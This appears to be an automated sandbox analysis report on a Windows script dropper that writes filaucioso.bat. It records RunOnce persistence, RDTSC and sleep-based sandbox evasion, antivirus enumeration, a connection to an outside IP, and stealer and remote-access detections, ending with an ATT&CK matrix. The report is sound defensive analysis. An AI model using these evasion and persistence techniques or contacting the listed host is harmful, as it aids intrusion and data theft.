        Source: C:\Windows\System32\wscript.exeSection loaded: iertutil.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: srvcli.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: netutils.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: windows.staterepositoryps.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: wintypes.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: appresolver.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: bcp47langs.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: slc.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: sppc.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: onecorecommonproxystub.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: apphelp.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: dpapi.dllJump to behavior
        Source: C:\ProgramData\filaucioso.batSection loaded: uxtheme.dllJump to behavior
        Source: C:\ProgramData\filaucioso.batSection loaded: userenv.dllJump to behavior
        Source: C:\ProgramData\filaucioso.batSection loaded: apphelp.dllJump to behavior
        Source: C:\ProgramData\filaucioso.batSection loaded: propsys.dllJump to behavior
        Source: C:\ProgramData\filaucioso.batSection loaded: dwmapi.dllJump to behavior
        Source: C:\ProgramData\filaucioso.batSection loaded: cryptbase.dllJump to behavior
        Source: C:\ProgramData\filaucioso.batSection loaded: oleacc.dllJump to behavior
        Source: C:\ProgramData\filaucioso.batSection loaded: ntmarta.dllJump to behavior
        Source: C:\ProgramData\filaucioso.batSection loaded: version.dllJump to behavior
        Source: C:\ProgramData\filaucioso.batSection loaded: shfolder.dllJump to behavior
        Source: C:\ProgramData\filaucioso.batSection loaded: kernel.appcore.dllJump to behavior
        Source: C:\ProgramData\filaucioso.batSection loaded: windows.storage.dllJump to behavior
        Source: C:\ProgramData\filaucioso.batSection loaded: wldp.dllJump to behavior
        Source: C:\ProgramData\filaucioso.batSection loaded: profapi.dllJump to behavior
        Source: C:\ProgramData\filaucioso.batSection loaded: riched20.dllJump to behavior
        Source: C:\ProgramData\filaucioso.batSection loaded: usp10.dllJump to behavior
        Source: C:\ProgramData\filaucioso.batSection loaded: msls31.dllJump to behavior
        Source: C:\ProgramData\filaucioso.batSection loaded: textinputframework.dllJump to behavior
        Source: C:\ProgramData\filaucioso.batSection loaded: coreuicomponents.dllJump to behavior
        Source: C:\ProgramData\filaucioso.batSection loaded: coremessaging.dllJump to behavior
        Source: C:\ProgramData\filaucioso.batSection loaded: coremessaging.dllJump to behavior
        Source: C:\ProgramData\filaucioso.batSection loaded: wintypes.dllJump to behavior
        Source: C:\ProgramData\filaucioso.batSection loaded: wintypes.dllJump to behavior
        Source: C:\ProgramData\filaucioso.batSection loaded: wintypes.dllJump to behavior
        Source: C:\ProgramData\filaucioso.batSection loaded: textshaping.dllJump to behavior
        Source: C:\ProgramData\filaucioso.batSection loaded: windows.storage.dllJump to behavior
        Source: C:\ProgramData\filaucioso.batSection loaded: wldp.dllJump to behavior
        Source: C:\ProgramData\filaucioso.batSection loaded: kernel.appcore.dllJump to behavior
        Source: C:\ProgramData\filaucioso.batSection loaded: uxtheme.dllJump to behavior
        Source: C:\ProgramData\filaucioso.batSection loaded: wininet.dllJump to behavior
        Source: C:\ProgramData\filaucioso.batSection loaded: iertutil.dllJump to behavior
        Source: C:\ProgramData\filaucioso.batSection loaded: sspicli.dllJump to behavior
        Source: C:\ProgramData\filaucioso.batSection loaded: profapi.dllJump to behavior
        Source: C:\ProgramData\filaucioso.batSection loaded: ondemandconnroutehelper.dllJump to behavior
        Source: C:\ProgramData\filaucioso.batSection loaded: winhttp.dllJump to behavior
        Source: C:\ProgramData\filaucioso.batSection loaded: iphlpapi.dllJump to behavior
        Source: C:\ProgramData\filaucioso.batSection loaded: mswsock.dllJump to behavior
        Source: C:\ProgramData\filaucioso.batSection loaded: winnsi.dllJump to behavior
        Source: C:\ProgramData\filaucioso.batSection loaded: urlmon.dllJump to behavior
        Source: C:\ProgramData\filaucioso.batSection loaded: srvcli.dllJump to behavior
        Source: C:\ProgramData\filaucioso.batSection loaded: netutils.dllJump to behavior
        Source: C:\ProgramData\filaucioso.batSection loaded: dnsapi.dllJump to behavior
        Source: C:\ProgramData\filaucioso.batSection loaded: rasadhlp.dllJump to behavior
        Source: C:\ProgramData\filaucioso.batSection loaded: fwpuclnt.dllJump to behavior
        Source: C:\ProgramData\filaucioso.batSection loaded: schannel.dllJump to behavior
        Source: C:\ProgramData\filaucioso.batSection loaded: mskeyprotect.dllJump to behavior
        Source: C:\ProgramData\filaucioso.batSection loaded: ntasn1.dllJump to behavior
        Source: C:\ProgramData\filaucioso.batSection loaded: msasn1.dllJump to behavior
        Source: C:\ProgramData\filaucioso.batSection loaded: dpapi.dllJump to behavior
        Source: C:\ProgramData\filaucioso.batSection loaded: cryptsp.dllJump to behavior
        Source: C:\ProgramData\filaucioso.batSection loaded: rsaenh.dllJump to behavior
        Source: C:\ProgramData\filaucioso.batSection loaded: cryptbase.dllJump to behavior
        Source: C:\ProgramData\filaucioso.batSection loaded: gpapi.dllJump to behavior
        Source: C:\ProgramData\filaucioso.batSection loaded: ncrypt.dllJump to behavior
        Source: C:\ProgramData\filaucioso.batSection loaded: ncryptsslp.dllJump to behavior
        Source: C:\ProgramData\filaucioso.batSection loaded: mscoree.dllJump to behavior
        Source: C:\ProgramData\filaucioso.batSection loaded: version.dllJump to behavior
        Source: C:\ProgramData\filaucioso.batSection loaded: vcruntime140_clr0400.dllJump to behavior
        Source: C:\ProgramData\filaucioso.batSection loaded: ucrtbase_clr0400.dllJump to behavior
        Source: C:\ProgramData\filaucioso.batSection loaded: ucrtbase_clr0400.dllJump to behavior
        Source: C:\ProgramData\filaucioso.batSection loaded: wbemcomn.dllJump to behavior
        Source: C:\ProgramData\filaucioso.batSection loaded: amsi.dllJump to behavior
        Source: C:\ProgramData\filaucioso.batSection loaded: userenv.dllJump to behavior
        Source: C:\ProgramData\filaucioso.batSection loaded: avicap32.dllJump to behavior
        Source: C:\ProgramData\filaucioso.batSection loaded: msvfw32.dllJump to behavior
        Source: C:\ProgramData\filaucioso.batSection loaded: winmm.dllJump to behavior
        Source: C:\ProgramData\filaucioso.batSection loaded: winmm.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B54F3741-5B07-11cf-A4B0-00AA004A55E8}\InprocServer32Jump to behavior

        Data Obfuscation

        barindex
        Source: C:\Windows\System32\wscript.exeAnti Malware Scan Interface: .Run("C:\ProgramData\filaucioso.bat", "1", "false");
        Source: Yara matchFile source: 00000001.00000002.2030976668.000000000503C000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
        Source: C:\ProgramData\filaucioso.batCode function: 1_2_6E3A1A98 GlobalAlloc,lstrcpyA,lstrcpyA,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,lstrcpyA,GetModuleHandleA,LoadLibraryA,GetProcAddress,lstrlenA,1_2_6E3A1A98
        Source: C:\ProgramData\filaucioso.batCode function: 1_2_6E3A2F60 push eax; ret 1_2_6E3A2F8E

        Persistence and Installation Behavior

        barindex
        Source: C:\ProgramData\filaucioso.batFile created: C:\Users\user\AppData\Local\Temp\Unsurveyable197\Busaos.pifJump to dropped file
        Source: C:\ProgramData\filaucioso.batFile created: C:\Users\user\AppData\Local\Temp\Unsurveyable197\Busaos.pifJump to dropped file
        Source: C:\Windows\System32\wscript.exeFile created: C:\ProgramData\filaucioso.batJump to dropped file
        Source: C:\ProgramData\filaucioso.batFile created: C:\Users\user\AppData\Local\Temp\nsj1E85.tmp\System.dllJump to dropped file
        Source: C:\Windows\System32\wscript.exeFile created: C:\ProgramData\filaucioso.batJump to dropped file
        Source: C:\Windows\System32\wscript.exeFile created: C:\ProgramData\filaucioso.batJump to dropped file
        Source: C:\ProgramData\filaucioso.batRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce AfmystificeringenJump to behavior
        Source: C:\ProgramData\filaucioso.batRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce AfmystificeringenJump to behavior
        Source: C:\ProgramData\filaucioso.batRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce AfmystificeringenJump to behavior
        Source: C:\ProgramData\filaucioso.batRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce AfmystificeringenJump to behavior
        Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\ProgramData\filaucioso.batProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\ProgramData\filaucioso.batProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\ProgramData\filaucioso.batProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\ProgramData\filaucioso.batProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\ProgramData\filaucioso.batProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\ProgramData\filaucioso.batProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\ProgramData\filaucioso.batProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\ProgramData\filaucioso.batProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\ProgramData\filaucioso.batProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\ProgramData\filaucioso.batProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\ProgramData\filaucioso.batProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\ProgramData\filaucioso.batProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\ProgramData\filaucioso.batProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\ProgramData\filaucioso.batProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\ProgramData\filaucioso.batProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\ProgramData\filaucioso.batProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\ProgramData\filaucioso.batProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\ProgramData\filaucioso.batProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\ProgramData\filaucioso.batProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\ProgramData\filaucioso.batProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\ProgramData\filaucioso.batProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\ProgramData\filaucioso.batProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\ProgramData\filaucioso.batProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\ProgramData\filaucioso.batProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\ProgramData\filaucioso.batProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\ProgramData\filaucioso.batProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\ProgramData\filaucioso.batProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\ProgramData\filaucioso.batProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\ProgramData\filaucioso.batProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\ProgramData\filaucioso.batProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\ProgramData\filaucioso.batProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\ProgramData\filaucioso.batProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\ProgramData\filaucioso.batProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\ProgramData\filaucioso.batProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\ProgramData\filaucioso.batProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\ProgramData\filaucioso.batProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\ProgramData\filaucioso.batProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\ProgramData\filaucioso.batProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\ProgramData\filaucioso.batProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\ProgramData\filaucioso.batProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\ProgramData\filaucioso.batProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\ProgramData\filaucioso.batProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\ProgramData\filaucioso.batProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\ProgramData\filaucioso.batProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\ProgramData\filaucioso.batProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\ProgramData\filaucioso.batProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\ProgramData\filaucioso.batProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\ProgramData\filaucioso.batProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\ProgramData\filaucioso.batProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\ProgramData\filaucioso.batProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\ProgramData\filaucioso.batProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\ProgramData\filaucioso.batProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\ProgramData\filaucioso.batProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\ProgramData\filaucioso.batProcess information set: NOOPENFILEERRORBOXJump to behavior

        Malware Analysis System Evasion

        barindex
        Source: C:\ProgramData\filaucioso.batAPI/Special instruction interceptor: Address: 552CFE4
        Source: C:\ProgramData\filaucioso.batAPI/Special instruction interceptor: Address: 20ACFE4
        Source: C:\ProgramData\filaucioso.batRDTSC instruction interceptor: First address: 54D4ED2 second address: 54D4ED2 instructions: 0x00000000 rdtsc 0x00000002 cmp eax, edx 0x00000004 cmp ebx, ecx 0x00000006 jc 00007F781D12237Bh 0x00000008 test dx, cx 0x0000000b inc ebp 0x0000000c test cx, C2B2h 0x00000011 inc ebx 0x00000012 test di, 2248h 0x00000017 rdtsc
        Source: C:\ProgramData\filaucioso.batRDTSC instruction interceptor: First address: 2054ED2 second address: 2054ED2 instructions: 0x00000000 rdtsc 0x00000002 cmp eax, edx 0x00000004 cmp ebx, ecx 0x00000006 jc 00007F781C77735Bh 0x00000008 test dx, cx 0x0000000b inc ebp 0x0000000c test cx, C2B2h 0x00000011 inc ebx 0x00000012 test di, 2248h 0x00000017 rdtsc
        Source: C:\ProgramData\filaucioso.batMemory allocated: D0000 memory reserve | memory write watchJump to behavior
        Source: C:\ProgramData\filaucioso.batMemory allocated: 337F0000 memory reserve | memory write watchJump to behavior
        Source: C:\ProgramData\filaucioso.batMemory allocated: 357F0000 memory reserve | memory write watchJump to behavior
        Source: C:\ProgramData\filaucioso.batThread delayed: delay time: 922337203685477Jump to behavior
        Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-TimerJump to behavior
        Source: C:\ProgramData\filaucioso.batWindow / User API: threadDelayed 8667Jump to behavior
        Source: C:\ProgramData\filaucioso.batWindow / User API: threadDelayed 1113Jump to behavior
        Source: C:\ProgramData\filaucioso.batDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nsj1E85.tmp\System.dllJump to dropped file
        Source: C:\ProgramData\filaucioso.batAPI coverage: 2.0 %
        Source: C:\Windows\System32\wscript.exe TID: 7508Thread sleep time: -30000s >= -30000sJump to behavior
        Source: C:\ProgramData\filaucioso.bat TID: 7268Thread sleep time: -23980767295822402s >= -30000sJump to behavior
        Source: C:\ProgramData\filaucioso.bat TID: 6048Thread sleep count: 8667 > 30Jump to behavior
        Source: C:\ProgramData\filaucioso.bat TID: 6048Thread sleep count: 1113 > 30Jump to behavior
        Source: C:\ProgramData\filaucioso.bat TID: 7268Thread sleep count: 34 > 30Jump to behavior
        Source: C:\ProgramData\filaucioso.batFile Volume queried: C:\ FullSizeInformationJump to behavior
        Source: C:\ProgramData\filaucioso.batFile Volume queried: C:\ FullSizeInformationJump to behavior
        Source: C:\ProgramData\filaucioso.batCode function: 1_2_004062F0 FindFirstFileA,FindClose,1_2_004062F0
        Source: C:\ProgramData\filaucioso.batCode function: 1_2_004057B5 GetTempPathA,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,FindNextFileA,FindClose,1_2_004057B5
        Source: C:\ProgramData\filaucioso.batCode function: 1_2_00402765 FindFirstFileA,1_2_00402765
        Source: C:\ProgramData\filaucioso.batCode function: 5_2_00402765 FindFirstFileA,5_2_00402765
        Source: C:\ProgramData\filaucioso.batCode function: 5_2_004062F0 FindFirstFileA,FindClose,5_2_004062F0
        Source: C:\ProgramData\filaucioso.batCode function: 5_2_004057B5 DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,FindNextFileA,FindClose,5_2_004057B5
        Source: C:\ProgramData\filaucioso.batThread delayed: delay time: 922337203685477Jump to behavior
        Source: wscript.exe, 00000000.00000003.1715545165.0000020E78BF3000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: DLfeCxqUqemupzIZZAezmSbQGIlcGKKLNWuNSgefPihiGmTpbcGKNLCGLfLkPiBuGUOdf@
        Source: wscript.exe, 00000000.00000003.1716175744.0000020E78BE7000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: DACnLKGRUjULRTaTuiRofilPNApTKoWkGJcihLQocudWAKLNLqemupcNKzRokKRlnoKae8
        Source: wscript.exe, 00000000.00000003.1790076467.0000020E76E71000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ACnLKGRUjULRTaTuiRofilPNApTKoWkGJcihLQocudWAKLNLqemupcNKzRokKRlnoKae
        Source: wscript.exe, 00000000.00000002.1793069434.0000020E78FE4000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1783017730.0000020E78FE4000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWN
        Source: wscript.exe, 00000000.00000003.1790895980.0000020E78C0D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1716344400.0000020E78C0D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1787328230.0000020E78C00000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1790025540.0000020E78C04000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1715545165.0000020E78C0D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1716569906.0000020E78C0D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ACnLKGRUjULRTaTuiRofilPNApTKoWkGJcihLQocudWAKLNLqemupcNKzRokKRlnoKaeG
        Source: wscript.exe, 00000000.00000002.1792303188.0000020E76EA3000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1793069434.0000020E78FE4000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1783017730.0000020E78FE4000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1782867612.0000020E76EA3000.00000004.00000020.00020000.00000000.sdmp, filaucioso.bat, 00000005.00000002.3009633630.000000000348D000.00000004.00000020.00020000.00000000.sdmp, filaucioso.bat, 00000005.00000002.3009633630.0000000003438000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
        Source: filaucioso.bat, 00000005.00000002.3009633630.000000000348D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWc4
        Source: wscript.exe, 00000000.00000003.1790895980.0000020E78C0D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1716344400.0000020E78C0D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1787328230.0000020E78C00000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1790025540.0000020E78C04000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1715545165.0000020E78C0D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1716569906.0000020E78C0D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: LfeCxqUqemupzIZZAezmSbQGIlcGKKLNWuNSgefPihiGmTpbcGKNLCGLfLkPiBuGUOdfM
        Source: wscript.exe, 00000000.00000003.1787328230.0000020E78C00000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1790025540.0000020E78C04000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: LfeCxqUqemupzIZZAezmSbQGIlcGKKLNWuNSgefPihiGmTpbcGKNLCGLfLkPiBuGUOdfX
        Source: wscript.exe, 00000000.00000003.1714870474.0000020E78C02000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1715125263.0000020E78BE1000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1790895980.0000020E78C0D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1716344400.0000020E78C0D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1787328230.0000020E78C00000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1790076467.0000020E76DEE000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1790025540.0000020E78C04000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1715027425.0000020E76E1D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1715545165.0000020E78C0D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1716569906.0000020E78C0D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1790768918.0000020E76E3D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: gGZojGCkPQGhOWgLpWgppUKkxIoKBkofhmumZpuzZctdjPkTZLivOUoLSfdKLCOrgoQA = "ACnLKGRUjULRTaTuiRofilPNApTKoWkGJcihLQocudWAKLNLqemupcNKzRokKRlnoKae"
        Source: wscript.exe, 00000000.00000003.1714870474.0000020E78C02000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1715125263.0000020E78BE1000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1790895980.0000020E78C0D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1716344400.0000020E78C0D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1787328230.0000020E78C00000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1790076467.0000020E76DEE000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1790025540.0000020E78C04000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1715027425.0000020E76E1D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1715545165.0000020E78C0D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1716569906.0000020E78C0D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1790768918.0000020E76E3D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: LfeCxqUqemupzIZZAezmSbQGIlcGKKLNWuNSgefPihiGmTpbcGKNLCGLfLkPiBuGUOdf = "iPWBQighLiQGPkiKasofzJNUAOKixdGNiZmWriNUxKLenuzLmWudKcOzKjUhLzTWkJUI"
        Source: C:\ProgramData\filaucioso.batAPI call chain: ExitProcess graph end nodegraph_1-4198
        Source: C:\ProgramData\filaucioso.batAPI call chain: ExitProcess graph end nodegraph_1-4374
        Source: C:\ProgramData\filaucioso.batCode function: 1_2_00403248 EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,CharNextA,LdrInitializeThunk,GetTempPathA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,GetTempPathA,lstrcatA,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,LdrInitializeThunk,CopyFileA,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,1_2_00403248
        Source: C:\ProgramData\filaucioso.batCode function: 1_2_6E3A1A98 GlobalAlloc,lstrcpyA,lstrcpyA,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,lstrcpyA,GetModuleHandleA,LoadLibraryA,GetProcAddress,lstrlenA,1_2_6E3A1A98
        Source: C:\ProgramData\filaucioso.batMemory allocated: page read and write | page guardJump to behavior

        HIPS / PFW / Operating System Protection Evasion

        barindex
        Source: C:\Windows\System32\wscript.exeFile created: filaucioso.bat.0.drJump to dropped file
        Source: C:\Windows\System32\wscript.exeNetwork Connect: 103.53.40.62 443Jump to behavior
        Source: C:\Windows\System32\wscript.exeProcess created: C:\ProgramData\filaucioso.bat "C:\ProgramData\filaucioso.bat" Jump to behavior
        Source: C:\ProgramData\filaucioso.batProcess created: C:\ProgramData\filaucioso.bat "C:\ProgramData\filaucioso.bat" Jump to behavior
        Source: C:\ProgramData\filaucioso.batQueries volume information: C:\ProgramData\filaucioso.bat VolumeInformationJump to behavior
        Source: C:\ProgramData\filaucioso.batQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
        Source: C:\ProgramData\filaucioso.batQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
        Source: C:\ProgramData\filaucioso.batQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
        Source: C:\ProgramData\filaucioso.batQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
        Source: C:\ProgramData\filaucioso.batCode function: 1_2_00403248 EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,CharNextA,LdrInitializeThunk,GetTempPathA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,GetTempPathA,lstrcatA,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,LdrInitializeThunk,CopyFileA,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,1_2_00403248
        Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
        Source: filaucioso.bat, 00000005.00000002.3030011749.000000003654D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: s Defender\MsMpeng.exe
        Source: filaucioso.bat, 00000005.00000002.3009633630.00000000034F0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
        Source: C:\ProgramData\filaucioso.batWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct

        Stealing of Sensitive Information

        barindex
        Source: Yara matchFile source: 00000005.00000002.3029149028.00000000337F1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: Process Memory Space: filaucioso.bat PID: 7924, type: MEMORYSTR

        Remote Access Functionality

        barindex
        Source: Yara matchFile source: 00000005.00000002.3029149028.00000000337F1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: Process Memory Space: filaucioso.bat PID: 7924, type: MEMORYSTR
        ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
        Gather Victim Identity Information121
        Scripting
        Valid Accounts1
        Windows Management Instrumentation
        121
        Scripting
        1
        DLL Side-Loading
        1
        Disable or Modify Tools
        11
        Input Capture
        2
        File and Directory Discovery
        Remote Services1
        Archive Collected Data
        1
        Ingress Tool Transfer
        Exfiltration Over Other Network Medium1
        System Shutdown/Reboot
        CredentialsDomainsDefault Accounts1
        Native API
        1
        DLL Side-Loading
        1
        Access Token Manipulation
        1
        Deobfuscate/Decode Files or Information
        LSASS Memory215
        System Information Discovery
        Remote Desktop Protocol11
        Input Capture
        11
        Encrypted Channel
        Exfiltration Over BluetoothNetwork Denial of Service
        Email AddressesDNS ServerDomain Accounts1
        Exploitation for Client Execution
        1
        Registry Run Keys / Startup Folder
        111
        Process Injection
        3
        Obfuscated Files or Information
